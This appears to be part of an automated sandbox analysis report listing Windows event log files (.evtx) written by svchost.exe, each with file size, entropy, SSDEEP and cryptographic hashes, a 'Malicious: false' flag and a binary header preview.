Preview:	ElfChnk...............................................j.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&..............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.475283731894672
Encrypted:	false
SSDEEP:	384:qWhDIEQAGxIHIFIWiIfeIT4IEIIInIhvohIG6IfDIT7IoIEIDIIInI0I9IGsIfnN:qWZxGkilOIRS4
MD5:	7CAE980F2C7CE7B4F31DCFD5F768D5BC
SHA1:	EB5A09DA7BE0F3FEF7F187B51F558691C3F7D688
SHA-256:	C31DFD5044ED07C8E6632891671BE7544A8C784C4434529F9D72459E13EF4AAB
SHA-512:	10EE849BE5192BEB1C599647A08E553FC7F403CF50CA4C96A8B1EA50DFF46CE681F447DEC4EBD2E55454ECCC0F37A65DFC4D7FF012CA40F7D17F19F6F6E6C1D7
Malicious:	false
Preview:	ElfChnk.T...............T.......................h............................................................................6N........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................................................a........F..........1........................................)..........................**......T.......B..d..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8023807109333921
Encrypted:	false
SSDEEP:	384:Fch6iIvcImIvITIQIoIoI3IEIMIoIBIOIRTIWeIZIEPdINI:FcoxXxP
MD5:	996D00E5A8B66706691FE697CCD68A7A
SHA1:	C90C99232451BAF2DCEB02C56C69CA9194390A9D
SHA-256:	95EF5245BEB2BBFD8EB8F5CE3A0C81869EF2AFACA54EF3445C3B144909C6A4B2
SHA-512:	FEA1D551151A622B151133814ECA8DE8EE4E3DA6D08F81CCE931FA7A64242E732A283E03A4B21EE922AF24F6FF0AF5EE2F26CDB7AA534583063C40F9C40DA0C8
Malicious:	false
Preview:	ElfChnk.....................................`"...#...l]....................................................................upp.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................^...............................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.999253421723821
Encrypted:	false
SSDEEP:	768:h4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH130:j
MD5:	11CAFE60067FAE9C5A304C7A7DAC0EB5
SHA1:	0E72987588CB8557C7CD00AD3D8956CDC0593C35
SHA-256:	1AFA765FD9A0D9659C2A02A266ED4FD303C82BD9AFF45F0E7167E335F91E042E
SHA-512:	764A5D459803B989800473821647907FF484C914778A8AE42257E4791C1C1369E5490AB9365665C257045A007907981E78C1F2B4D5652BCA777873439537E9D0
Malicious:	false
Preview:	ElfChnk.....................................0...@......~....................................................................u!..................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67176
Entropy (8bit):	3.912745595939774
Encrypted:	false
SSDEEP:	768:kbGhsutDBjV8k+S7eUtHpoVWWnHzLKvc90Xjt0GMAoLx07SZRcZv76NcRUjGHzLc:cVutDBjV8k+S7PtHpoVW
MD5:	9E1209159752BCB553A728D0A66840F4
SHA1:	0EE970903906E39BEE53880343852556F5D502F7
SHA-256:	6AFFC2A5591864145C6CE3EB62A53815064710E02C48B1FA99645C315CE5B7DB
SHA-512:	9F2BB2DD68AF947DF525C7DBABDEEE3B62E1B4042ACA85FABAD91837DE81B93D060281AC23B9B2B6143F7F4C72917B3008DEFF7B3FAE9F9D0F4E5B3C72CA2214
Malicious:	false
Preview:	ElfChnk.................O.......Z...........H.......A.Q......................................................................A ................8...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................&.................................................................................h...X........G............E!&...............................................................8.......P.....!..................G.......`......`...4.......X....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l.;...@\.K.f<...ZM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l./.O.p.e.r.a.t.i.o.n.a.l......L.......... . . h.........Y.......{.b............E!&...............................................................8.......P...C.!...o...........

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.437741585013902
Encrypted:	false
SSDEEP:	768:syQjw+1jN2RkG6OQFAWAbYgO0TKLp85lxbW1mCgS:5Qjw+y4AVKLp85S1mCgS
MD5:	E303D264B6B0374B9682D9A3817764DC
SHA1:	8DEDE4181998E04B4CFB0CFFD73EF66908398C24
SHA-256:	C01FD811B9F7C9D5AF92196B62769F52AA4157A573BD4E1EAB675AC79A73380D
SHA-512:	2C15E9667398FE2640F0E63244B41E5CA160C0AF5E52F32333A1601C08649FC91F6D2C25FF9668C213B942B655CE1AF92DDD3134B47E3D2A00EA13706BD16DEA
Malicious:	false
Preview:	ElfChnk.........................................(...B......................................................................... .................v...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........................................................O...................**.................E............E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7602204514023913
Encrypted:	false
SSDEEP:	384:ChP8o8Z85848V8M8g8D8R8E8J83W1d8b8ut8l8:CR
MD5:	A71D2A716E4B8C87379C50F91A376243
SHA1:	B55D17BCD95C285812D918E820EDC513B8BC4373
SHA-256:	4C279C417D131982DEF275E92EC2EB1CCF985E5A5785B8989D28972A72AAD650
SHA-512:	4759EE9F1D1DF7F9C3452A40C1A58C66A8928378CC69B464944C4732BC5042BE1FFA81996F5943702CF7379C632B41081F9109421EB9A2243CCF06AF02BC45E8
Malicious:	false
Preview:	ElfChnk.........................................8!..=.......................................................................w]..........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......v...............................................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.7780335879449853
Encrypted:	false
SSDEEP:	1536:4XhqUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:4XQnS
MD5:	9CCBC3D02460EA12B44E3733DD34BF89
SHA1:	5CE2CE08C2F9F7653B0C059ACDE19D8D2962187F
SHA-256:	59905EAB56BF3D0172E6952E418864BDF1AC6F0FD3FF3E26BD104FF2B85560C1
SHA-512:	EE7E03FA93712648939C4C32B8501532A963663EEC87BAE23C532556F7EEFC56545CA90CC422EACCF01D7B16AC44F7F230567B65E880780C6C7A25D2F9690596
Malicious:	false
Preview:	ElfChnk...................................(N...O.....2......................................................................:.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........=......................................................O.......................**..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4655200384785823
Encrypted:	false
SSDEEP:	768:m0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O5vaP4eZiGai2niL9i5:ucE5
MD5:	EC1441AF347A3AEBD3C499EB77112044
SHA1:	062F0645AF0FF401308A0582362E6FE001C5444F
SHA-256:	97F7D6CF9603D2EF964F3D680F5902853382AE270ED6A37576364BD19E0A1C4A
SHA-512:	687D850AB0E8E4E75E484ED8E56658749F1331854AD6E28400538F050E3F372CA791023C87CE192D1417C70E63C0911E589AD9AE103CE30BB68A03EED414AABA
Malicious:	false
Preview:	ElfChnk.........@...............@............{..@}....c.....................................................................].................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&................................................b..........%_..........................]...................*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	1912
Entropy (8bit):	3.5231043941622877
Encrypted:	false
SSDEEP:	48:MDWUCKOrCK3QkB69DgOCKOrCK3QWkcqrlXl:OCKOrCKgo69DgOCKOrCKgWkcGlXl
MD5:	1068FBE8F00EFF2C3C807C57AB4E3FDA
SHA1:	F08393AB7A5D45D80316AB27A4CBA6A1D2250D95
SHA-256:	8EFB0261D31A98E12B820A167B5C883D3FD2E2AF2726C488D3A5F2E9D681317E
SHA-512:	17D4C9CA9B688144DE420AAF4A744EC89EF95E560FAC2062829801AE3B56EE0A3D692963AD7E205E85060F869C9DEC50EF88515BB4208359DE3F728842101285
Malicious:	false
Preview:	ElfChnk.'.......2.......'.......2............N...Q..........................................................................e0.................^...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................7.......................&...............................................................................**......1........a.............E!&...............................................................L.......b.....!..................a........i....................1....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^7...........h.......>...................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.335307911754908
Encrypted:	false
SSDEEP:	384:NpQ/hDGCyCkCzCRCFCaC5ClCWQCyCiECLCtmWCTCYCflCdCEtC0C6gCwzChWCVJY:NpQ/dJjm6EIf8aG3e
MD5:	DEC13E419235D71E66C768AF61C819EB
SHA1:	C2601E3DF8A2D6E230D368CA0ECDD4BD11786D1A
SHA-256:	E9AAB8B817BC34F1B7009A6ABC439ACD1EFC991293198857268699458DF84552
SHA-512:	A78230EF0961E00D27B109F0EEF6DEDB9198759E1858C1DCB8C0E1032D48242C23726BB2931EE62A47A5C4D8434CD3BB537B0E6DF85D62653E3648A49A22AA3D
Malicious:	false
Preview:	ElfChnk.U...............U.............................w..................................................................... j..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................1[..............................&........>......................................y.......................................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.470554172113501
Encrypted:	false
SSDEEP:	1536:J0dBaHTmPeG68WdEWx/Tm3vaA1YNNd/vTGMk1o4X7BOBrc3gkWqJfECYqzGDXbJm:J0razmmG/WCWlTYvn1ANxvqMYo4XdOBH
MD5:	7C2BA3824E6FDFDC9B34997831CF5BA4
SHA1:	2F75B2D7953CA1F3F139E66C1C1C785DC11F6F0B
SHA-256:	902EC3153154EDF682DF6D35860B9D42B3C6016F787D02E0CC1D2371F3997192
SHA-512:	4BC9FFCB38302D4764B8632EC360FFDE079EF9818F6128BE07F6E89671A510A32AC93145F3FDB4CDBD6363390EAB157D8B164C2B04B86A36C3B93A08AE7A6B52
Malicious:	false
Preview:	ElfChnk......................................h...i.....n....................................................................n.2.................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..8............C',_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.468620151101956
Encrypted:	false
SSDEEP:	1536:pj9GvEkeLhw6IrKOu4zB5c63VJ7qhFRbw7ZGnCg7HZANhlPqizIUxKu/GFy9pUJX:pj9GvEkeLhw6IrKOu4zB5c63VJ7qhFR7
MD5:	E88618B1DEA05E7BA0E67923A3BB5A74
SHA1:	A304E914984ECB8EDE4083775AD58F3B3F0553FD
SHA-256:	8B403D79B42CE87F51D13443DE16B113DF0CD7F84E8E2B263CF54B9059BD29CD
SHA-512:	167952B232B09140552F3787D7BA649098A3C4B6A14F73B4A9AC68B164BCDD921996876C791A3057161E042680CE1858B927691ED2C3E6050EC723D0774451CF
Malicious:	false
Preview:	ElfChnk......... ............... ...........H........P.>.....................................................................S.c................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F...............................................................9...&...........................q.......I...................................Q.......**..............t...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.5283250731919766
Encrypted:	false
SSDEEP:	384:YeUThv707s7a7v7yP7c7V7u7C7Z7C7M7n7K7G7d7Yp7PC787h7H7l73+7L7L7j7s:YeUTRVb
MD5:	9CB77B06F0F33B4BC7A638085998A032
SHA1:	04C57BABBE0B49A1AF70143FD2D9ED9071A14D5C
SHA-256:	AC3F98137ECCA65B1C5EBDF80B02F693E51AEA05B0B033CCB9A91C68778FF751
SHA-512:	488788029BCCEA4A3D2C8ED7492D895469BE0962884BC868F080E9CB479AF7ECDAF46E17FC08C9912B953E614E9DEE673DF994170931A99D9E28248117C6F4F8
Malicious:	false
Preview:	ElfChnk.....................................0y...{.._N......................................................................%.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................-@..............E9..m...................&.......................................................->......................**..8...........D...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.268440759929627
Encrypted:	false
SSDEEP:	384:whc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinJ:w6Ovc0S5UyEeDgLvqSX79K
MD5:	3E6903B4F529505011694E65B60A9154
SHA1:	05BC372041FD161154C35F843BFE439066F3A6C6
SHA-256:	E7BB68D43D88025FC2EC47BCA4957A08CEDF53FAA24751D95019CEF867223393
SHA-512:	8C700C45A3A01A79F9E0AB74BE5C0E718E231AAD4395F631A3DADA5C83E937EEBD0804DB0AF340A341440414ACD9293713B9ECB1A074F5E794CA21DFAB8D8CA0
Malicious:	false
Preview:	ElfChnk.........?...............?............q...s..>O......................................................................C..................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6^..............................................w...............................*...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8178355996317889
Encrypted:	false
SSDEEP:	384:HhGuZumutu4uEu5uOuDuyb2uPu1uuuCeuDu7utu:HD
MD5:	FFB7825ACA321A39E4DD495EC4B7E3BE
SHA1:	A4EBE4617E4B98D93FDE5546893A4D29441B5F44
SHA-256:	F56C28857B0E8D30F34089306B9CCF6655F7ED073412E710AB10D747092DA0D2
SHA-512:	86D7C252C870B9362394CFA35B99AE257228E477A5346D8EF5B91E81F3A78CD008DC52A5F3D12C395EFB715F82B849CAD805AD71CF8C58514614F83EACB4F63E
Malicious:	false
Preview:	ElfChnk......................................"...$....u.....................................................................v..C................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......>...............................................................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.075909180265887
Encrypted:	false
SSDEEP:	384:NhzAsAvAaAmANSAbNAQAfCHA+AHchArAXATAvAjALATABAtGABS78jAOAqA4eAEp:NGCs2k64i/tpqA
MD5:	3A282029B03747ACB9F0A3496C717BD9
SHA1:	705490A345F883E024CC1641981A90DA6EDADCF5
SHA-256:	2A94A3FFC2481031F58367AB9F99D7972299D7F537520D2A6318B1BAA6B158F8
SHA-512:	F98AEB35B035B10B5C3CCA876E445D502AD84F66BE857B17EFE715983F9834ECAEDCCE5FF03914853115DE1644E9541FF111BD79A3607FA707735546A0C04AD4
Malicious:	false
Preview:	ElfChnk.....................................H.......}{........................................................................dE................<.......................d...=...........................................................................................................................f...............?...........................m...................M...F............................+.......................%..............&...............................................................................**..............\|..3_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.162414582102809
Encrypted:	false
SSDEEP:	384:khVpW2pPkpPrpPepP1pP4pPHpPypPxpPYpPDpPypPlpPct1pPnpPsLpPAWpPQpPT:k+tZb
MD5:	0D76B94CB673E07C9297775F6635BB30
SHA1:	42037C8D133B4CD395BA6BDC1108C30882248866
SHA-256:	7133E41E960AD5F46294DCBDC3FFE8CFCFD120213DF680017947924D3C013A8B
SHA-512:	9E5D104332631EDBCB8AF55BCEA2CD7B7EB34A0FE1DF226579E005A775840CDF05C86CCBEF902730138ED1A27347B4FB070FAF37046320740009CC11BAC11C33
Malicious:	false
Preview:	ElfChnk.........'...............'...................u..4.................................................................... ...........................................B...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**...............h{.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.217583590897775
Encrypted:	false
SSDEEP:	384:3hUIpGcRpDvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBD:3YDoh1VLBCVz6t0o3ZeF9UBlG
MD5:	C5BB06A11AA8E33C5D2512146A14F414
SHA1:	BCA1D0ABD07806B4DDB34B4483B04B57A840CC26
SHA-256:	5A42653C87D73E415D15B08AE3511312F991238224022920D85CDEE43316C64A
SHA-512:	8FE28DAC0CEB3BBB462390492FA7623077448CCD58E04EE38C6CE9FF92FAD6647176DD61A628A4C03C3C5DEE9912D67375AE77865DE52D23B2B253C01C43FC86
Malicious:	false
Preview:	ElfChnk.........................................P......a.................................................................... ..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..............T.0.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1666137709834492
Encrypted:	false
SSDEEP:	384:uwhwCCRzCaCkClCzCYC/CyCVCGCMCvCzCw9CdqCVCICsC:uwKFT
MD5:	88E290384531AC91E63C802B158E726D
SHA1:	2AFD218C14B290A33DC27B0BDBA87AADFD428D9B
SHA-256:	36B48D00709B0F3B917927DE97D395C4785F6A7B61CCC5C72C799C4521FD9D97
SHA-512:	7969E4BDC2659D8412FD187135AB04B329AE134E2A5E386D86BA0E490F979621DCE05DF1118FA31987CB5FD27CB964773F4A67D6884002F7E9579A752E5A2AAD
Malicious:	false
Preview:	ElfChnk.....................................84..p6..........................................................................Pl..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................v)........................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

